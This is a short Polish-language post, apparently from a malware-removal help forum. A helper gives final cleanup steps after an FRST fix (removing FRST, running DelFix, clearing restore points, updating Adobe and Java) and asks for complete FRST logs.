Niektóre antywirusy, w tym AVG, będą wykrywać i blokować FRST. Fix FRST ukończony w drugim podejściu. Czyli kroki końcowe: Usuń FRST i jego logi z folderu "Fixitpc" na Pulpicie. Zastosuj DelFix i wyczyść foldery Przywracania systemu: KLIK. W linku również najnowsze wersje Adobe i Java.

Nazwa pliku wskazuje, że wyciągnąłeś raport FRST z folderu C:\FRST\Logs - to jest archiwum, bieżące raporty powstają zawsze tam skąd uruchamiasz FRST, czyli w tym przypadku w folderze Pobrane. Poza tym brakuje obowiązkowych plików FRST Addition i Shortcut. Proszę wróć do konfiguracji FRST i zrób porządne logi: KLIK.